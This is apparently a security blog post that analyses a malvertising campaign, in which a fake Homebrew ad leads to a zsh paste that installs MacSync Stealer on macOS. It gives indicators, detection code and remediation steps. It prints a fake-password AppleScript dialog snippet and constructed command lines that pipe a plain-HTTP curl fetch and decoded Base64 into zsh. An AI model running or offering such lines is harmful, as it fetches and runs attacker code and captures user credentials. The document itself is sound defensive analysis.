Fake Homebrew Google ad: MacSync Stealer's 3-stage zsh to Keychain via osascript
TL;DR
**What happened** 2026-04-30: a Google sponsored ad for “Homebrew” landed users on sites.google[.]com/view/brewpage, a fake Homebrew page that asked them to paste a 225-byte zsh into Terminal. SANS ISC’s Brad Duncan published the infection chain on 2026-05-01.
**Infection chain** 225-byte zsh → 1,448-byte stage 2 over plain HTTP + 2,647-byte stage 3 from inline Base64 → osascript shows a fake “System Preferences” dialog → Keychain, browsers, wallets, .ssh/.aws/.kube zipped to /tmp/osalogging.zip → POSTed to glowmedaesthetics[.]com over HTTP.
**What to grep ~/.zsh_history for:** curl http://glowmedaesthetics[.]com/curl/..., /tmp/osalogging.zip, /tmp/sync[0-9]{7}/ directories, co-occurring osascript + curl processes, any DNS/HTTP traffic to glowmedaesthetics[.]com.
**What to do** Cut the affected machine off the network. Then, from a known-clean device, in this order:
- Reset the macOS login password (the fake dialog validated against dscl . authonly, so treat the password as captured)
- Reset Keychain entries (login-password compromise unlocks Keychain)
- Rotate SSH keys
- Rotate GitHub / npm / cloud (AWS/GCP/Azure) tokens, kubeconfig, browser-synced sessions
- Reset crypto wallet seeds
- Wipe and reinstall macOS on the infected device
Search “Homebrew” on Google and the sponsored ad shows above the real brew.sh.
That ad sends users to a fake Homebrew page that hands out a 225-byte zsh one-liner to paste into Terminal, which fans out into a 3-stage chain that deploys MacSync Stealer.
SANS Internet Storm Center’s Brad Duncan observed this malicious ad on 2026-04-30 and published the infection chain, three SHA256 hashes, and the C2 domain on 2026-05-01.
A developer who searches “how to install brew” gets walked from ad click → Google Sites → short zsh paste → Base64 expansion → fake osascript password dialog → ZIP exfiltration in a single straight line.
From sponsored ad to Google Sites fake page
In the SANS ISC observation, the search-result ad routed through a google[.]com/aclk?sa=L&ai=... click-tracking URL and landed on sites.google[.]com/view/brewpage.
Google Sites is a free, legitimate Google service, so the domain itself looks like a path under google.com.
If you rely on https:// and the padlock icon to spot phishing, there’s nothing to flag here — the domain genuinely sits inside Google.
The fake page is built to look like Homebrew’s real install page.
SANS ISC’s screenshots show the layout, copy-button position, and CTA all matching the real brew.sh.
The real Homebrew site is brew.sh, and the official install command reads raw.githubusercontent.com/Homebrew/install/HEAD/install.sh.
Homebrew’s own documentation says the installer explains what it does before running and asks for confirmation before starting.
The fake page only mimics the appearance of curl + zsh — the surface form, not the source URL.
Developers paste curl ... | sh one-liners from official sites all the time, so a page reached through an ad slots into the same muscle memory and the paste happens without friction.
Malvertising aimed at developers is not new.
This blog previously covered the GitHub Repo Squatting attack, which used Google ads and lookalike domains around GitHub Desktop.
This time the Homebrew install procedure itself is wired into the attack chain.
The 3-stage zsh: 225 bytes → 1,448 bytes → 2,647 bytes
The three SHA256 hashes SANS ISC uploaded to VirusTotal map out the chain.
The first thing pasted is a 225-byte zsh; from there a 1,448-byte stage 2 and a 2,647-byte stage 3 unfold.
| Stage | Size | SHA256 (first 16 chars) | Role |
|---|---|---|---|
| 1 | 225 bytes | a4fcfecc5ac8fa57 | Initial zsh copy-pasted from the fake page. Short enough to slip past signature-based detection |
| 2 | 1,448 bytes | 0d58616c750fc853 | Main zsh body, fetched over HTTP from hxxp[:]//glowmedaesthetics[.]com/curl/63810ee8...237d |
| 3 | 2,647 bytes | 86d0c50cab4f394c | zsh expanded from a Base64 blob embedded in stage 1. Pipes an AppleScript payload into osascript |
Stage 1 stays small to fit the copy-button delivery method.
A long command would raise eyebrows or get partially read while pasted, so only a launcher like curl ... | base64 -D | zsh is shown in the open — the actual body either lives elsewhere or hides in the script’s own Base64 block.
```mermaid
flowchart TD
A["Google search<br/>Homebrew"] --> B["Sponsored ad<br/>aclk?sa=L"]
B --> C["sites.google.com<br/>/view/brewpage"]
C --> D["Paste 225B zsh<br/>into Terminal"]
D --> E["curl http://<br/>glowmedaesthetics.com/curl/..."]
D --> F["base64 -D | zsh<br/>on inline blob"]
E --> G["Stage 2 zsh 1,448B"]
F --> H["Stage 3 zsh 2,647B"]
G --> I["Pipe AppleScript<br/>into osascript"]
H --> I
I --> J["Fake System Preferences<br/>password dialog"]
J --> K["Create /tmp/osalogging.zip"]
K --> L["HTTP POST to<br/>glowmedaesthetics.com"]
```
The C2 distribution URL runs over plain http, not HTTPS.
A curl/{long-hash} path over unencrypted HTTP leaves obvious traces in corporate proxies, EDR network logs, and DNS-based threat feeds.
osascript and the fake “System Preferences” dialog
The AppleScript that zsh feeds in is ultimately executed in memory by osascript.
Cognisys Group Labs’ analysis of MacSync identifies a getpwd() function inside this AppleScript that’s responsible for collecting the macOS account password.
```applescript
display dialog "Required Application Helper..." ¬
with title "System Preferences" ¬
with icon file "...LockedIcon.icns" ¬
default answer "" with hidden answer
```
The title says “System Preferences” and the icon uses the genuine LockedIcon.icns.
Visually it’s indistinguishable from a real macOS system authentication prompt — no cue points back to the Terminal as the originator.
The entered password is validated through dscl . authonly, the native macOS directory-services command that checks a local account’s password, and the dialog loops until the validation passes.
From the user’s side it looks like macOS itself just asked for the login password several times.
The moment the correct password is typed in, the validated string is handed straight to the attacker.
osascript is an Apple-signed binary that drives macOS automation and ships AppleScript hooks for many legitimate apps.
Blocking the binary itself in endpoint security would also kill automation tools, Adobe apps, and Microsoft Office’s scripting layer.
SOC Prime tracks higher-tier MacSync campaigns that never write the AppleScript to disk — they pipe the text fetched via curl straight into osascript -e or stdin, leaving no file-based artifact for on-disk scanners.
What gets stolen: browsers, Keychain, SSH keys, wallets
Cognisys Group Labs and Rhys Downing’s MacSync variant analyses list the collection targets concretely.
| Category | Targets |
|---|---|
| Browsers | Chrome / Brave / Edge Cookies, Login Data, Web Data |
| Wallet extensions | MetaMask, Phantom, TronLink — Local Extension Settings and IndexedDB |
| Crypto apps | Ledger Live, Trezor Suite application directories |
| Messaging | Telegram tdata/ |
| Dev / ops | ~/.ssh, ~/.aws, ~/.kube, *.keychain-db |
| File extensions | .wallet, .seed, .kdbx, .pem, .ovpn |
Developer laptops hoard tokens for GitHub, npm, cloud providers, SSH, Docker, and CI.
Losing ~/.aws, ~/.kube, and ~/.ssh in one shot extends the blast radius from the individual user out into the org’s CI/CD pipelines and production environment.
The collected data is staged under /tmp/osalogging.zip or inside /tmp/sync[0-9]{7}/, zipped with ditto, and POSTed to the C2.
The filename osalogging is a literal osascript + logging mash-up — the artifact name itself broadcasts the AppleScript-driven nature of the operation.
MacSync Stealer: from Mac.c rebrand to the third wave
MacSync Stealer is a rebrand of Mac.c stealer, released by an actor called “Mentalpositive” in April 2025.
It launched as a MaaS (Malware-as-a-Service: monthly-subscription malware infrastructure rented to other criminals), and from July 2025 onward it picked up traction as one of the major macOS stealers alongside AMOS and Odyssey.
CIS (the organization running MS-ISAC, the Multi-State Information Sharing and Analysis Center for US state and local governments) has been tracking a MacSync campaign through 2026 aimed at SLTT (State, Local, Tribal, Territorial) macOS endpoints.
MS-ISAC’s MDBR (Malicious Domain Blocking and Reporting, a DNS-level blocking service) alone has blocked over 2.5 million DNS requests and shared more than 1,000 IoCs (Indicators of Compromise).
Sophos X-Ops has been observing the third wave, which kicked off in February 2026, with distribution expanding to ClickFix CAPTCHAs, SEO poisoning (manipulating search results to push malicious pages to the top), and lures disguised as free e-books or utility apps.
Jamf Threat Labs reports a variant where the dropper is a Swift app signed and notarized with an Apple Developer ID — passing through Gatekeeper without warnings — in a dropper → external C2 → MacSync payload flow.
The “Google ad → Google Sites → zsh paste” line SANS ISC caught is one of several distribution channels that were operating in parallel inside this larger campaign as of April 2026.
Same fake Homebrew domain, different stealer: Cuckoo Stealer comparison
The fake Homebrew site pattern has been recycled by multiple stealers since early 2026.
Hive Pro’s February 2026 report covers a Cuckoo Stealer campaign that used typosquatted Homebrew lookalike domains (homabrews[.]org, brewsh[.]cx, brrewsh[.]org, brewmacos[.]com, brew[.]lat, brew[.]pages[.]dev, raw[.]brewsh[.]cx, braw[.]sh) and persisted via ~/Library/LaunchAgents/com.homebrew.brewupdater.plist.
Lining up the Cuckoo Stealer variant against the SANS ISC MacSync observation, the entry surface is shared (ClickFix-style copy-paste lure) but the back half differs.
| Item | Cuckoo Stealer (2026-01) | MacSync (2026-04) |
|---|---|---|
| Distribution | Typosquatted domains | Google sponsored ad + Google Sites |
| Initial execution | Copy-button injects a curl (ClickFix) | 225-byte zsh paste |
| Credential capture | Repeated dscl . authonly prompts | osascript “System Preferences”-style dialog |
| Persistence | com.homebrew.brewupdater.plist LaunchAgent | None observed by SANS ISC (closer to a relay downloader) |
| C2 | Routes through 5[.]255[.]123[.]244 | glowmedaesthetics[.]com over HTTP |
Between January’s Cuckoo Stealer and April’s MacSync, the lure is the same but the relay scripts, C2, and persistence are swapped for different infrastructure.
The “Homebrew” brand itself keeps getting reused as a foothold — the place attackers reliably get the first command executed on a macOS host.
Detection points and MITRE ATT&CK mapping
SOC Prime’s Sigma rules for MacSync Stealer flag the following behaviors across cmdline and file_event sources.
- cmdline: Base64 string manipulation (base64 -D, echo of long alphanumeric blobs, direct pipe to zsh)
- cmdline: curl + osascript invoked in the same session
- file_event: .zip creation under /tmp/, especially named osalogging.zip or sync[0-9]{7} directories
- file_event: creation of ~/Library/LaunchAgents/com.homebrew.* plists (shared with Cuckoo Stealer)
- Network: plain http:// traffic to glowmedaesthetics[.]com, paths of the form /curl/{64-char hex}
Even on dev machines without EDR, plain macOS tools — fs_usage, opensnoop, tail -f /var/log/system.log — surface the /tmp/osalogging.zip creation and unusual osascript invocations.
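The behaviours listed above applied to telemetry, as an added example that is not SOC Prime’s rule set or code from the original post: constructed cmdline, file_event and network records are matched against a regex form of each indicator, plus a same-session curl + osascript correlation that a single-event rule cannot express.

```python
import re
from collections import defaultdict

# Constructed sample telemetry shaped after the indicators listed above; not real EDR output.
SAMPLE_EVENTS = [
    {"type": "cmdline", "session": "tty1", "cmd": "echo QUJDREVGR0hJSktMTU5PUA== | base64 -D | zsh"},
    {"type": "cmdline", "session": "tty1", "cmd": "curl -fsSL http://glowmedaesthetics.com/curl/" + "a" * 64},
    {"type": "cmdline", "session": "tty1", "cmd": "osascript -"},
    {"type": "cmdline", "session": "tty2", "cmd": "git status"},
    {"type": "file_event", "path": "/tmp/osalogging.zip"},
    {"type": "file_event", "path": "/tmp/sync4819233/Login Data"},
    {"type": "file_event", "path": "/Users/dev/Library/LaunchAgents/com.homebrew.brewupdater.plist"},
    {"type": "file_event", "path": "/Users/dev/Downloads/report.zip"},
    {"type": "network", "url": "http://glowmedaesthetics.com/curl/" + "a" * 64},
    {"type": "network", "url": "https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh"},
]

FIELD = {"cmdline": "cmd", "file_event": "path", "network": "url"}

# Single-event rules: name -> (event type, pattern). Matching uses re.search, so anchors matter.
RULES = {
    "base64_decode_piped_to_shell": ("cmdline", re.compile(r"base64\s+(-D|-d|--decode)\b.*\|\s*(zsh|bash|sh)\b")),
    "zip_staged_in_tmp": ("file_event", re.compile(r"^/tmp/(osalogging\.zip$|sync\d{7}/|[^/]+\.zip$)")),
    "homebrew_launchagent": ("file_event", re.compile(r"/Library/LaunchAgents/com\.homebrew\.[^/]*\.plist$")),
    "plain_http_curl_hash_path": ("network", re.compile(r"^http://[^/]+/curl/[0-9a-f]{64}$")),
    "known_c2_domain": ("network", re.compile(r"^https?://([^/]*\.)?glowmedaesthetics\.com(/|$)")),
}


def detect(events):
    """Return {rule name: [evidence, ...]} for every rule that fires on the events."""
    hits = defaultdict(list)
    tools_per_session = defaultdict(set)
    for ev in events:
        value = ev[FIELD[ev["type"]]]
        for name, (etype, pattern) in RULES.items():
            if ev["type"] == etype and pattern.search(value):
                hits[name].append(value)
        if ev["type"] == "cmdline":
            for tool in ("curl", "osascript"):
                if re.search(rf"(^|\s){tool}\b", value):
                    tools_per_session[ev["session"]].add(tool)
    # Correlation rule: curl and osascript invoked in the same session.
    for session, tools in tools_per_session.items():
        if {"curl", "osascript"} <= tools:
            hits["curl_and_osascript_same_session"].append(session)
    return dict(hits)
```

Running detect(SAMPLE_EVENTS) fires every rule exactly on the constructed malicious records and stays silent on the benign ones (git status, the Downloads ZIP, the official installer URL).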
Mapping the SOC Prime rules and the SANS ISC observation to MITRE ATT&CK:
| Tactic | Technique | Behavior |
|---|---|---|
| Initial Access | T1204.001 User Execution: Malicious Link | Sponsored ad click |
| Initial Access | T1204.004 Malicious Copy and Paste | Copy-paste lure on Google Sites |
| Execution | T1059.004 Unix Shell | 3-stage zsh |
| Execution | T1059.002 AppleScript | osascript shows the fake dialog |
| Credential Access | T1056.002 GUI Input Capture | “System Preferences”-styled password prompt |
| Discovery | T1592.002 Software Components Discovery | Enumeration of browsers, wallet extensions, keychain |
| Collection | T1005 Data from Local System | ~/.ssh, ~/.aws, Keychain, wallet data |
| Collection | T1074.001 Local Data Staging | /tmp/osalogging.zip, /tmp/sync[0-9]{7}/ |
| Exfiltration | T1041 Exfiltration Over C2 Channel | HTTP POST to glowmedaesthetics[.]com |
Confirming infection and rotating tokens
The real Homebrew installer is reached from brew.sh.
Skip search-ad results; open it from a bookmark or by typing the URL.
The official install command on that page looks like:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
When checking, look past the brew.sh label: verify that the fetch target inside the command is raw.githubusercontent.com/Homebrew/install/HEAD/install.sh, that the execution shell isn’t quietly switched to zsh, and that the payload isn’t hidden behind Base64.
On pages with a “Copy” button, the displayed string and the actual clipboard content can differ.
Paste into a plain text editor first and read what’s there before sending it to Terminal.
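A small vetting script for the pasted text, added here and not part of the original post or of Homebrew’s own tooling: it runs the three checks above (fetch target, shell switch, Base64) and decodes any inline Base64 so it can be read instead of executed. The genuine one-liner and the fake are constructed inputs; the fake only follows the shape the text describes, and its blob decodes to a harmless echo.

```python
import base64
import re

# Constructed inputs (not the real stage-1 script): the genuine one-liner quoted
# above, and a fake built in the shape the text describes, i.e. a plain-HTTP fetch
# piped into zsh plus an inline Base64 blob. The blob decodes to a harmless echo.
OFFICIAL_INSTALLER = "https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh"
GENUINE = f'/bin/bash -c "$(curl -fsSL {OFFICIAL_INSTALLER})"'
FAKE_BLOB = base64.b64encode(b'echo "stage 3 would run here"').decode()
FAKE = (f"curl -s http://glowmedaesthetics.com/curl/{'0' * 64} | zsh; "
        f"echo {FAKE_BLOB} | base64 -D | zsh")

URL_RE = re.compile(r"https?://[^\s\"')]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def vet_install_command(cmd):
    """Return the reasons a pasted command is NOT the official Homebrew installer."""
    findings = []
    urls = URL_RE.findall(cmd)
    if OFFICIAL_INSTALLER not in urls:
        findings.append("fetch target is not the official install.sh")
    findings += [f"plain-HTTP fetch: {u}" for u in urls if u.startswith("http://")]
    if re.search(r"\|\s*zsh\b|\bzsh\s+-c\b", cmd):
        findings.append("payload is piped into zsh instead of /bin/bash -c")
    if re.search(r"base64\s+(-D|-d|--decode)\b", cmd):
        findings.append("inline Base64 decoding present")
    return findings


def decode_embedded_blobs(cmd):
    """Decode Base64 runs so their contents can be read without being executed.

    Runs that are not valid Base64 (e.g. the 64-hex C2 path) are skipped."""
    decoded = []
    for blob in B64_RE.findall(cmd):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


if __name__ == "__main__":
    for label, cmd in (("genuine", GENUINE), ("fake", FAKE)):
        print(label, vet_install_command(cmd) or ["looks like the official installer"])
        print("  embedded blobs:", decode_embedded_blobs(cmd))
```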
If the script was already pasted and run: cut the machine off the network, then grep ~/.zsh_history and ~/.bash_history for unfamiliar lines containing curl, zsh, base64 -D, or osascript.
The presence of /tmp/osalogging.zip, a /tmp/sync[0-9]{7}/ directory, or traffic logs to glowmedaesthetics[.]com constitutes a post-execution infection.
Developer machines store tokens for GitHub, npm, cloud providers, SSH, Docker, and CI.
Changing passwords from the infected machine just hands them right back, so do the rotation from a known-clean device: macOS login password, Keychain, SSH keys, GitHub/npm tokens, cloud keys (AWS/GCP/Azure), kubeconfig, browser-synced sessions, and crypto wallet seeds, in that order.
The Keychain is encrypted at rest, but if the attacker has captured the correct login password through dscl authonly, the same password unlocks the Keychain.
Start with the login password reset.
References
- SANS ISC - Malicious Ad for Homebrew Leads to MacSync Stealer
- Homebrew official site
- Homebrew Documentation - Installation
- SOC Prime - Fake Homebrew Ad Leads to MacSync Stealer Infection
- Cognisys Group Labs - Deep Analysis of the Malicious AppleScript Payload (MacSync Stealer)
- CIS - MacSync Stealer Campaign Impacting U.S. SLTT macOS Users
- SOPHOS - Evil evolution: ClickFix and macOS infostealers
- Jamf Threat Labs - MacSync Stealer Evolves: From ClickFix to Code-Signed Swift Malware
- Hive Pro - Fake Homebrew ClickFix Campaign Delivering Cuckoo Stealer on macOS